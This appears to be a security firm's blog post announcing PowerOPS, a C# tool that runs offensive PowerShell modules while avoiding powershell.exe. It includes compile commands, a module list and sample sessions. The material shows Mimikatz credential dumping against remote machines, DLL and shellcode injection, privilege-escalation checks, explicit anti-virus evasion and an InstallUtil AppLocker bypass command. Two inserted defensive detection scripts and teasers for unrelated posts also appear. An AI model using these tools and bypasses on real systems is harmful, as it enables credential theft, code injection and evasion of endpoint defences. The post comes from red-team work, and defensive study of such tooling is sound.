At Portcullis, one of the most frequent assessments we perform is the breakout. One of the main challenges we face during these assessments is getting command execution that can either help escalate our privileges or allow us to gain access to other systems on the network. Sometimes we find harsh group policy restrictions in place that block access to the Windows Command Prompt, PowerShell and others. These, however, are not always properly implemented, i.e. they do not block access to all executables (and allow only certain programs to run).
After getting command execution, we want to attack other systems on the network. However, it isn’t always easy to get a flexible toolbox onto the system that allows us to gather information and launch further attacks. PowerShell is our preferred post-exploitation language, and powershell.exe access is usually blocked (as are .ps1 scripts). However, since the block is often incorrectly implemented, i.e. the DLLs used by PowerShell aren’t usually blocked, this can open some doors. On top of that, some AVs have started implementing basic signatures that pick up some well-known PowerShell scripts. The bypass is trivial, but we want to be as stealthy as possible, and it still delays us a bit.
How can we bypass some of these “security mitigations” and speed up our tests? PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). Besides this, it includes multiple offensive PowerShell modules to make the post-exploitation process easier.
It tries to follow the KISS principle, being as simple as possible. The main goal is to make it easy to use PowerShell offensively and to help evade anti-virus and other mitigations.
To do this, it:
Additionally you can run any valid PowerShell command.
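From the defensive side, the weak spot described above (blocking powershell.exe but not the engine DLL) is also the detection opportunity: any process that has loaded System.Management.Automation.dll without being a known PowerShell host is worth a look. The following script is an added example, not part of PowerOPS or the Portcullis post; it assumes it runs from an elevated 64-bit PowerShell session and that the $knownHosts allow-list is tuned to your estate.

```powershell
# Added example (not part of PowerOPS): list processes that have loaded the PowerShell
# engine assembly without being one of the expected PowerShell host executables.
# Run from an elevated 64-bit PowerShell so the module lists of other processes are readable.
$knownHosts = @('powershell', 'powershell_ise', 'pwsh')   # extend with hosts legitimate in your estate

function Find-UnexpectedPowerShellHosts {
    foreach ($p in Get-Process) {
        try {
            # The GAC native image loads as System.Management.Automation.ni.dll, so match the prefix.
            $engine = $p.Modules | Where-Object { $_.ModuleName -like 'System.Management.Automation*.dll' }
        } catch {
            continue   # protected processes or a 32/64-bit mismatch: module list not readable
        }
        if ($engine -and ($knownHosts -notcontains $p.ProcessName)) {
            [pscustomobject]@{
                PID     = $p.Id
                Process = $p.ProcessName
                Path    = $p.Path
                Engine  = ($engine | Select-Object -First 1).FileName
            }
        }
    }
}

Find-UnexpectedPowerShellHosts | Format-Table -AutoSize
```

A hit is not proof of misuse (several management consoles host the engine legitimately), so baseline the output before alerting on it.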
The source code is available at GitHub.
To compile PowerOPS you need to import this project within Microsoft Visual Studio or if you don’t have access to a Visual Studio installation, you can compile it as follows:
To compile it as an x86 binary:
C:\> cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (Or newer .NET version folder)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\> csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\username\PowerOPS_x86.exe /platform:x86 "C:\path\to\PowerOPS\PowerOPS\*.cs"
To compile it as an x64 binary:
C:\> cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (Or newer .NET version folder)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\> csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\username\PowerOPS_x64.exe /platform:x64 "C:\path\to\PowerOPS\PowerOPS\*.cs"
PowerOPS uses the System.Management.Automation namespace, so make sure you have the System.Management.Automation.dll within your source path when compiling outside of Visual Studio.
Just run the binary and type show to list available modules.
PS > show
[-] This computer is not part of a Domain! Some functions will not work!
[+] Nishang
Get-Information
Get-PassHashes
Port-Scan
[+] PowerSploit
Get-KeyStrokes
Invoke-DllInjection
Invoke-Mimikatz
Invoke-NinjaCopy
Invoke-Shellcode
Invoke-TokenManipulation
Invoke-WmiCommand
Invoke-ReflectivePEInjection
PowerView
PowerUp
[+] Empire
Invoke-PsExec
Invoke-SSHCommand
[+] Others
Auto-GPPPassword
Get-ProductKey
PowerCat
PS >
PowerUp and PowerView are loaded as modules, so Get-Command -Module will show you all available functions.
PS > get-command -module powerup

CommandType     Name                             ModuleName
-----------     ----                             ----------
Function        Find-DLLHijack                   PowerUp
Function        Find-PathHijack                  PowerUp
Function        Get-ApplicationHost              PowerUp
Function        Get-ModifiableFile               PowerUp
Function        Get-RegAlwaysInstallElevated     PowerUp
Function        Get-RegAutoLogon                 PowerUp
Function        Get-ServiceDetail                PowerUp
Function        Get-ServiceFilePermission        PowerUp
Function        Get-ServicePermission            PowerUp
Function        Get-ServiceUnquoted              PowerUp
Function        Get-UnattendedInstallFile        PowerUp
Function        Get-VulnAutoRun                  PowerUp
Function        Get-VulnSchTask                  PowerUp
Function        Get-Webconfig                    PowerUp
Function        Install-ServiceBinary            PowerUp
Function        Invoke-AllChecks                 PowerUp
Function        Invoke-ServiceAbuse              PowerUp
Function        Invoke-ServiceDisable            PowerUp
Function        Invoke-ServiceEnable             PowerUp
Function        Invoke-ServiceStart              PowerUp
Function        Invoke-ServiceStop               PowerUp
Function        Restore-ServiceBinary            PowerUp
Function        Test-ServiceDaclPermission       PowerUp
Function        Write-HijackDll                  PowerUp
Function        Write-ServiceBinary              PowerUp
Function        Write-UserAddMSI                 PowerUp

PS >
All your PowerShell fu applies. PowerOPS is basically a PowerShell shell with some modules/functions pre-loaded, so Get-Help is your friend and will help you understand how the modules can be used.
Let’s say you want to see examples on how to use Invoke-Mimikatz.
PS > Get-Help Invoke-Mimikatz -examples

NAME
    Invoke-Mimikatz

SYNOPSIS
    This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk. The script has a ComputerName parameter which allows it to be executed against multiple computers. This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.

    Function: Invoke-Mimikatz
    Author: Joe Bialek, Twitter: @JosephBialek
    Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: firstname.lastname@example.org. Twitter @gentilkiwi
    License: http://creativecommons.org/licenses/by/3.0/fr/
    Required Dependencies: Mimikatz (included)
    Optional Dependencies: None
    Version: 1.5
    ReflectivePEInjection version: 1.1
    Mimikatz version: 2.0 alpha (2/16/2015)

    -------------------------- EXAMPLE 1 --------------------------

    C:\PS>Execute mimikatz on the local computer to dump certificates.
    Invoke-Mimikatz -DumpCerts

    -------------------------- EXAMPLE 2 --------------------------

    C:\PS>Execute mimikatz on two remote computers to dump credentials.
    Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2")

    -------------------------- EXAMPLE 3 --------------------------

    C:\PS>Execute mimikatz on a remote computer with the custom command "privilege::debug exit" which simply requests debug privilege and exits
    Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"

PS >
Or simply look at the whole help available for Invoke-DllInjection.
PS > Get-Help Invoke-DllInjection -full

NAME
    Invoke-DllInjection

SYNOPSIS
    Injects a Dll into the process ID of your choosing.

    PowerSploit Function: Invoke-DllInjection
    Author: Matthew Graeber (@mattifestation)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

SYNTAX
    Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String> [<CommonParameters>]

DESCRIPTION
    Invoke-DllInjection injects a Dll into an arbitrary process.

PARAMETERS
    -ProcessID <Int32>
        Process ID of the process you want to inject a Dll into.

        Required?                    true
        Position?                    1
        Default value                0
        Accept pipeline input?       false
        Accept wildcard characters?  false

    -Dll <String>
        Name of the dll to inject. This can be an absolute or relative path.

        Required?                    true
        Position?                    2
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?  false

    <CommonParameters>
        This cmdlet supports the common parameters: Verbose, Debug, ErrorAction, ErrorVariable, WarningAction, WarningVariable, OutBuffer, PipelineVariable, and OutVariable. For more information, see about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216).

INPUTS

OUTPUTS

NOTES
    Use the '-Verbose' option to print detailed information.

    -------------------------- EXAMPLE 1 --------------------------

    C:\PS>Invoke-DllInjection -ProcessID 4274 -Dll evil.dll

    Description
    -----------
    Inject 'evil.dll' into process ID 4274.

RELATED LINKS
    http://www.exploit-monday.com

PS >
You can play around with the output…
PS > get-productkey

OSDescription        Computername  OSVersion  ProductKey
-------------        ------------  ---------  ----------
Microsoft Windows... VISUALSTUDIO  6.1.7601   ABCDE-54321-UVXY...

PS > get-productkey | format-list

OSDescription : Microsoft Windows 7 Professional N
Computername  : VISUALSTUDIO
OSVersion     : 6.1.7601
ProductKey    : ABCDE-54321-UVXYZ-12345-LMNOP
Save the output of your commands the way you want…
PS > invoke-allchecks | Out-File -Encoding ascii powerup.output.txt
PS > type powerup.output.txt

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.

[*] Checking for unquoted service paths...

[*] Checking service executable and argument permissions...

[*] Checking service permissions...

[*] Checking %PATH% for potentially hijackable .dll locations...

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for vulnerable registry autoruns and configs...

[*] Checking for vulnerable schtask files/configs...

[*] Checking for unattended install files...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

PS >
Do some math…
PS > $a=1
PS > $b=4
PS > $c=$a+$b
PS > echo $c
5
Browse the file system…
PS > cd c:\
PS > ls

    Directory: C:\

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----        14/02/2016     17:21            bin
d----        17/02/2016     15:02            Dev-Cpp
d----        14/07/2009     04:20            PerfLogs
d-r--        26/04/2016     20:00            Program Files
d-r--        26/04/2016     20:00            Program Files (x86)
d----        19/02/2016     21:06            Python27
d-r--        26/11/2015     17:20            Users
d----        12/05/2016     15:53            Windows
-a---        19/03/2010     23:55    2073703 VS_EXPBSLN_x64_enu.CAB
-a---        19/03/2010     23:58     551424 VS_EXPBSLN_x64_enu.MSI

PS > pwd

Path
----
C:\

PS >
And so on…
PowerShell v5 comes with some new security features that will certainly affect some of the payloads contained in PowerOPS, so further development is expected, as well as the addition of new attack modules.
PowerOPS includes the InstallUtil AppLocker bypass technique from Casey Smith. To make use of it run as shown below:
C:\> cd \Windows\Microsoft.NET\Framework\v4.0.30319 (Or newer .NET version folder)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\> InstallUtil.exe /logfile= /LogToConsole=false /U C:\path\to\PowerOPS.exe
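The InstallUtil invocation above leaves a characteristic process-creation record, which is what a blue team can hunt for. The script below is an added example, not code from PowerOPS or the post; it assumes process creation auditing (Security event 4688) with command-line logging enabled, and that the ParentProcessName field is present (Windows 10 / Server 2016 and later).

```powershell
# Added example (not part of PowerOPS): hunt Security event 4688 for InstallUtil.exe started
# with the uninstall switch (/U), the pattern used to run an assembly's uninstaller code.
# Assumes "Audit Process Creation" and "Include command line in process creation events" are on.
function Find-InstallUtilUninstallRuns {
    param([datetime]$Since = (Get-Date).AddDays(-7))

    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = $Since }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Pull the named EventData fields out of the event XML.
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($n in $xml.Event.EventData.Data) { $data[$n.Name] = $n.'#text' }

        $isInstallUtil = $data['NewProcessName'] -like '*\InstallUtil.exe'
        # Match a standalone /U or /u anywhere in the command line.
        $hasUninstall  = $data['CommandLine'] -match '(^|\s)/u(\s|$)'

        if ($isInstallUtil -and $hasUninstall) {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                User        = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                Parent      = $data['ParentProcessName']   # absent on older Windows builds
                CommandLine = $data['CommandLine']
            }
        }
    }
}

Find-InstallUtilUninstallRuns | Format-Table -AutoSize -Wrap
```

Legitimate use of InstallUtil /U is rare outside software deployment, so a hit launched by an interactive user or from a user-writable path deserves follow-up.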
This post describes how Remote Desktop Protocol (RDP) connections can be vulnerable to a downgrade attack if Terminal Servers are configured insecurely.
What are cookies and why are they important?
Here at Portcullis, we are frequently involved in “red team” exercises, which means we subject an organisation’s information security systems to rigorous testing and analysis. The opposite of a red team is a “blue team”. A blue team attempts to identify and stop the red team from compromising systems. One of the techniques used when red teaming is to write malicious code to test the security systems of our clients. One of the issues we face resides in the fact that we need to bypass sandbox systems that analyse our files in real time to identify whether the potentially malicious file should be blocked and Indicators Of Compromise (IOCs) generated, or whether the files are benign and safe. At the same time, blue teams that catch our files will try to reverse engineer them in order to understand how we may be compromising systems. Even though the last point is not really relevant for us (ultimately we’re not the bad guys), the first point is.
Inter Process Communication (IPC) is a ubiquitous part of modern computing. Processes often talk to each other, and many software packages contain multiple components which need to exchange data to run properly. Named pipes are one of the many forms of IPC in use today and are extensively used on the Windows platform as a means to exchange data between running processes in a semi-persistent manner.
Recently, Kaspersky published research on how a Russian APT group uses hijacked satellite links to anonymise their malware command-and-control (C&C) servers (Satellite Turla: APT Command and Control in the Sky). As they say in their blog post, I researched and published how to abuse satellite DVB-S/2 internet communications, the technique used during the Epic Turla operation.
Following a recent post from a consultant at IBM discussing how privileged access should be performed on VIOS, I figured it was time to share some of our research in this arena. Those of you that are regular readers will know that I love root. For those of you that are new, welcome aboard.
This document is a written form of a workshop and presentation I gave at Portcullis Labs in late July 2015. It is a beginner’s walkthrough to understand the recent Flash bug that was discovered in Hacking Team’s pocket and given the sweet name of CVE-2015-5119. It was found and exploited by Vitaliy Toropov.
Those of you that have been following the UK infosec market recently will have noticed an upturn in talk relating to “Red Team” style engagements. Unlike a traditional penetration test, the object of such an exercise is not to locate vulnerabilities (though of course that helps) but rather to exercise the “Blue Team”, i.e. the internal users at an organisation responsible for defending their network. This change has been driven by CBEST and the associated STAR exam offerings from CREST, which have certainly raised the bar. Whilst most IT security consultancies are happy to talk about phishing, the level to which they go to mimic the target can vary.